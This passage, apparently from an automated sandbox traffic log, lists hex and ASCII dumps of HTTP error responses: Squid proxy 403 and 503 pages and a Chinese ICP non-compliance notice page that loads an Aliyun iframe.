document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:55 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:55 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:55 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
